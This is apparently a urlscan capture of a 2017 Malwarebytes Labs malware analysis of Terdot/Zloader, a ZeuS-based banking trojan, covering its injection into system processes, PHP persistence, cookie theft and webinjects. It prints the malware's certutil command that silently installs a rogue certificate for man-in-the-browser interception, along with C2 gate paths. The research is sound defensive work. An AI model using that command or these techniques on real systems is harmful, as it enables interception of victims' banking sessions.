www.malwarebytes.com
Open in
urlscan Pro
2600:9000:223c:e400:16:26c7:ff80:93a1
Public Scan
Submitted URL: https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/
Effective URL: https://www.malwarebytes.com/blog/news/2017/01/zbot-with-legitimate-applications-on-board
Submission: On September 30 via api from US — Scanned from DE
Effective URL: https://www.malwarebytes.com/blog/news/2017/01/zbot-with-legitimate-applications-on-board
Submission: On September 30 via api from US — Scanned from DE
Form analysis
2 forms found in the DOMGET
<form id="search-form" onsubmit="submitSearchBlog(event)" method="get">
<div class="searchbar-wrap-rightrail">
<label for="cta-labs-rightrail-search-submit-en" aria-label="cta-labs-rightrail-search-submit-en" aria-labelledby="cta-labs-rightrail-search-submit-en">
<input type="text" id="st-search-input-rightrail" class="st-search-input-rightrail" placeholder="Search Labs">
</label>
<button type="submit" id="cta-labs-rightrail-search-submit-en" aria-label="Submit your search query"><span class=""><img src="/blog/images/search.svg" alt="Magnifying glass"></span>
</button>
</div>
</form>
/newsletter/
<form class="newsletter-form form-inline" action="/newsletter/">
<div class="email-input">
<label for="cta-footer-newsletter-input-email-en" aria-label="cta-footer-newsletter-input-email-en" aria-labelledby="cta-footer-newsletter-input-email-en">
<input type="text" class="email-input-field" id="cta-footer-newsletter-input-email-en" name="email" placeholder="Email Address">
</label>
<input name="source" type="hidden" value="">
<input type="submit" class="submit-bttn" id="cta-footer-newsletter-subscribe-email-en" value="">
</div>
</form>
Text Content
The official Malwarebytes logoThe official Malwarebytes logo in a blue font Personal Personal * Security & Antivirus * Malwarebytes for Windows * Malwarebytes for Mac * Malwarebytes for Chromebook * Malwarebytes for Android * Malwarebytes for iOS * Malwarebytes AdwCleaner * Online Privacy * Malwarebytes Privacy VPN * Malwarebytes Browser Guard * * All-in-one Protection * Malwarebytes Premium + Privacy VPN New * Get Started * The ultimate guide to privacy protection New VISIT PRIVACY HUB VISIT PRIVACY HUB * * Stop infections before they happen * GET A FREE TRIAL GET A FREE TRIAL * * Find the right solution for you * SEE PERSONAL PRICING SEE PERSONAL PRICING Business Business * Solutions * BY COMPANY SIZE * Small Businesses * single figure icon 1-99 Employees Buy Online * Mid-size Businesses * two figure icon 100-999 Employees * Large Enterprise * three figure icon 1000+ Employees * BY INDUSTRY * Education * Finance * Healthcare * Government * Products * CLOUD-BASED SECURITY MANAGEMENT AND SERVICES * Endpoint Protection * Endpoint Protection for Servers * Endpoint Detection & Response * Endpoint Detection & Response for Servers * Incident Response * Malware Removal Service * Nebula Platform Architecture * Cloud Storage Scanning Service New * CLOUD-BASED SECURITY MODULES * DNS Filtering * Vulnerability & Patch Management * Remediation for CrowdStrike® * NEXT-GEN ANTIVIRUS FOR SMALL BUSINESS * For Teams * Get Started * * Find the right solution for your business * See business pricing See business pricing -------------------------------------------------------------------------------- * Don't know where to start? * Help me choose a product See business products selector -------------------------------------------------------------------------------- * See what Malwarebytes can do for you * Get a free trial Get a free trial -------------------------------------------------------------------------------- * Our sales team is ready to help. Call us now * Phone icon +49 (800) 723-4800 Pricing Partners Partners * Partner Icon Explore Partnerships * Partner Solutions * Resellers * Managed Service Providers * Computer Repair * Technology Partners * Buy now Buy Now * Partner Success Story * Marek Drummond Managing Director at Optimus Systems "Thanks to the Malwarebytes MSP program, we have this high-quality product in our stack. It’s a great addition, and I have confidence that customers’ systems are protected." * See full story See full story Resources Resources * Learn About Cybersecurity * Antivirus * Malware * Ransomware * Malwarebytes Labs – Blog * Glossary * Threat Center * Business Resources * Reviews * Analyst Reports * Case Studies * Press & News * Events * Featured Event: RSA 2021 * See Event See event Support Support * Technical Support * Personal Support * Business Support * Premium Services * Forums * Vulnerability Disclosure * Watch Icon Training for Personal Products * Watch Icon Training for Business Products * Featured Content * Privacy Logo Activate Malwarebytes Privacy on Windows device. * See Content See content FREE DOWNLOAD CONTACT US COMPANY COMPANY * About Malwarebytes * Careers * News & Press SIGN IN SIGN IN * My Account * Cloud Console * Partner Portal SUBSCRIBE Cybercrime | News | Threats ZBOT WITH LEGITIMATE APPLICATIONS ON BOARD Posted: January 26, 2017 by Malwarebytes Labs Recently, among the payloads delivered by exploit kits, we often find Terdot.A/Zloader - a downloader installing on the victim machine a ZeuS-based malware. Source code of the infamous ZeuS malware leaked in 2011. Since that time, many cybercriminals has adopted it and augmented with their own ideas. Recently, among the payloads delivered by exploit kits, we often find Terdot.A/Zloader - a downloader installing on the victim machine a ZeuS-based malware. The payload is very similar to the malware described in this article and referenced under the name Sphinx. However, after consulting with other researchers (special thanks to Matthew Mesa), we got proven that the bot that is sold as Sphinx is very different (sample). Since there are many confusions about the naming, we decided to stick to the name Terdot Zloader/Zbot. In this post we will have a look at the features and internals of this malware. As we will see, the dropped package consists not only of malicious files - but also legitimate applications, used for the malicious purpose. ANALYZED SAMPLE d45b8a20a991acd01d2ff63735fc1adf - original executable #1 950368afb934fd3fd5b2d4e6704b757b - original executable #2 fca092aca679edd9564d00e9640f939d - original executable #3 * ae1d1f4597f76912d7bd9962b96eecbb - loader (unpacked) * 268fd83403da27a80ab1a3cf9ac45b67 - payload.dll (injected into explorer) * 6c34779503414210378371d250a3a1af - client32.dll (Zbot downloaded and injected into msiexec, and into browsers) f9373dc232028da52ad33b017e33bbd3 - original executable #4 DISTRIBUTION Most of the analyzed samples were dropped from SundownEK - some of the campaigns are described in details here: 28 Dec 2016 , 6 Jan 2017, and 18 Jan 2017. However, we also encountered cases when the Terdot.A/Zloader was dropped by the malicious email attachment. BEHAVIORAL ANALYSIS After the sample is run, we can see it deploying explorer and then terminating. It is easy to guess, that it injected some malicious modules there. If we attach a debugger into the explorer process, we can see the injected shellcode, along with a new PE file (payload.dll). The interesting and unusual thing, typical for this Zloader is, that the DLL does not start at the beginning of the memory page, but after the shellcode: If we have an internet connection, the Zloader will load the second stage (the main bot) and inject it into msiexec.exe. The injected module beacons to the CnC and downloads other modules. Observed patterns of the gates: /FE8hVs3/gs98h.php /bdk/gate.php The communication is encrypted: CnC responds with a new PE file - the module of the malware: (client32.dll). Downloader decrypts it in the memory and injects further: after a while we can see the explorer terminating and another program being deployed: msiexec. The initial malware executable is deleted. Attaching debugger to msiexec, we can find the Zbot (client32.dll) implanted and running in the process space. From inside of the injected module another internet connection is made, and some new elements are being downloaded and dropped (including legitimate applications like certutil and php - their role will be described further). The same client32.dll is also injected in browsers. The module deployed inside msiexec.exe is used as a supervisor. It opens TCP sockets locally and communicates with the modules injected in browsers, in order to monitor opened pages. MITM The main module of the bot downloads and drops some new elements into the %TEMP% folder. Surprisingly, those files are non-malware. We can see the certutil application (0c6b43c9602f4d5ac9dcf907103447c4) along with it's dependencies - legitimate DLLs. In the same folder, there is also some alien certificate (filename, as well as the name of the issuer is randomly generated). The certificate is installed with the help of the certutil, for the purpose of Man-in-the-Middle attacks (in such cases they are also called Man-in-the-Browser). Example - a command line deployed during tests: "C:\Users\tester\AppData\Local\Temp\certutil.exe" -A -n "otdarufyr" -t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" -d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default" It is easy to guess that this malware targets web browsers. Indeed, if we run a browser and try to visit some site over HTTPS, we will see that the original certificates are replaced by the malicious one. See examples below - draw attention that the subject of the certificate contains the valid domain - only the issuer field can let us recognize, that the certificate is not legitimate: Satander MitB on Firefox: The browser claims that the connection is secure - but when we see the details, we can find, that the connection is "protected" by the fake certificate dropped by the malware: Facebook MitB on InternetExplorer: Browsers do not alert about any inconsistency - and the user who was not vigilant enough to check the details of the certificate, may easily get deceived... If we attach a debbugger into the running browser, we can see that the same client32.dll is injected there - along with some more code used for API redirections. PERSISTENCE In addition to the content dropped in %TEMP%, we can see some new folders with random names created in %APPDATA%: Interesting fact is that one of them contains legitimate php.exe (see on VirusTotal: php.exe, php5ts.dll). ...and some obfuscated php code: https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-script-php (Formatted version here). Other folders contains some encrypted data, i.e.: Interestingly, this php package is referenced at autostart: Link deploys the dropped php application and runs the script, that we saw before: We can easily suspect that this is a method of persistence. Deobfuscating the PHP code confirms this guess. See the same code after cleanup: https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-deobfuscated-php As we can notice, the file royxh.umh contains encrypted code of the malware. Using the presented PHP script it is decrypted back into the Zloader executable: fca092aca679edd9564d00e9640f939d The dropped file is run and then deleted. INSIDE ZLOADER - PAYLOAD.DLL This element - unpacked from the initial sample and injected into explorer.exe - is a downloader - identified as Terdot.A/Zloader. It is responsible for connecting with the CnC and downloading the main malicious module, that is the Zbot. ZBOT - CLIENT32.DLL The second stage is also a DLL - this time it is injected into msiexec.exe as well as into browsers: ATTACKED TARGETS The bot injects itself into the most popular browsers, in order to hook their API: It excludes from the attack computers with Russian language installed - but instead of doing it silently, like most of the malware - it is very openly announcing this fact: THE SQL PART Inside the bot we can find references to an SQL release from the end of 2016 (see SQLite Release 3.15.1 On 2016-11-04): 2016-11-04 12:08:49 1136863c76576110e710dd5d69ab6bf347c65e36 Presence of those references confirms, that the bot is pretty new, and probably under active development. We can also see many SQL queries and related error messages among the strings: They are used to read and manipulate browser cookies, that are stored in form of SQLite databases. Queries deployed: MAN-IN-THE-BROWSER The main module injected into msiexec opens local TCP sockets that are used to communicate with the module injected into browser. All the communication between the browser and particular website is first bypassed by client32.dll injected into msiexec. Like many Zbots, Terdot not only spy but also allows to modify the displayed content, by "WebInjects" and "WebFakes". Sites that are going to be hooked are specified by configuration. Example of the target list from one of the samples shows, that the main interest of the attackers are various banks: https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt Webinjects are implemented by adding malicious scripts (specialized for a specific target) into the content of the website. The scripts are hosted on the server controlled by attackers. Sample list of the scripts, fetched by the bot during tests: https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-injects-txt Those java scripts are implanted into the the attacked site before it is displayed in the browser - along with some more, obfuscated code. Templates of such implants are downloaded from the CnC server. You can see some examples here. CONCLUSION Terdot is yet another bot based on Zeus. Feature-wise it is similar to other bankers. However, I think it deserved some attention because of it's recent popularity. It has been prepared with attention to details, so we may suspect that it is a work of professionals. It is actively developed, distributed and maintained - so, the probability is high, that we will be seeing it more in the future. -------------------------------------------------------------------------------- This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com. SHARE THIS ARTICLE -------------------------------------------------------------------------------- COMMENTS -------------------------------------------------------------------------------- RELATED ARTICLES Exploits and vulnerabilities | News TWO NEW EXCHANGE SERVER ZERO-DAYS IN THE WILD September 30, 2022 - Two ProxyShell-like vulnerabilities are being used to exploit Microsoft Exchange Servers CONTINUE READING 0 Comments News OPTUS DATA BREACH "ATTACKER" SAYS SORRY, IT WAS A MISTAKE September 29, 2022 - A hacker stole the personal information of 10 million Optus customers, threatened to publish them in lots of 10,000 a day unless the ransom was paid, and then suddenly did a 180 degree turn. CONTINUE READING 0 Comments News APT28 ATTACK USES OLD POWERPOINT TRICK TO DOWNLOAD MALWARE September 28, 2022 - The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn't need macros CONTINUE READING 0 Comments News SPYWARE DISGUISES ITSELF AS ZOOM DOWNLOADS September 28, 2022 - Criminals are taking advantage Zoom's continuing popularity CONTINUE READING 0 Comments News | Scams FCC MOVES TO BLOCK ROBOTEXTS September 28, 2022 - The Federal Communications Commission wants mobile carriers to block spam texts at the network level. CONTINUE READING 0 Comments -------------------------------------------------------------------------------- ABOUT THE AUTHOR Malwarebytes Labs Contributors Threat Center Podcast Glossary Scams Write for Labs Cyberprotection for every one. twitter facebook linkedin Youtube instagram Cybersecurity info you can't do without Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats. Cyberprotection for every one. FOR PERSONAL Windows Mac iOS Android Privacy VPN SEE ALL COMPANY About Us Contact Us Careers News and Press Blog Scholarship Forums FOR BUSINESS Small Businesses Mid-size Businesses Large Enterprise Endpoint Protection Endpoint Detection & Response MY ACCOUNT Sign In SOLUTIONS Free Rootkit Scanner Free Trojan Scanner Free Virus Scanner Free Spyware Scanner Anti Ransomware Protection SEE ALL ADDRESS 3979 Freedom Circle 12th Floor Santa Clara, CA 95054 ADDRESS One Albert Quay 2nd Floor Cork T12 X8N6 Ireland LEARN Malware Hacking Phishing Ransomware Computer Virus Antivirus COMPANY About Us Contact Us Careers News and Press Blog Scholarship Forums MY ACCOUNT Sign In ADDRESS 3979 Freedom Circle, 12th Floor Santa Clara, CA 95054 ADDRESS One Albert Quay, 2nd Floor Cork T12 X8N6 Ireland twitter facebook linkedin Youtube instagram English Legal Privacy Accessibility Vulnerability Disclosure Terms of Service © 2022 All Rights Reserved Select your language * English * Deutsch * Español * Français * Italiano * Português (Portugal) * Português (Brasil) * Nederlands * Polski * Pусский * 日本語 * Svenska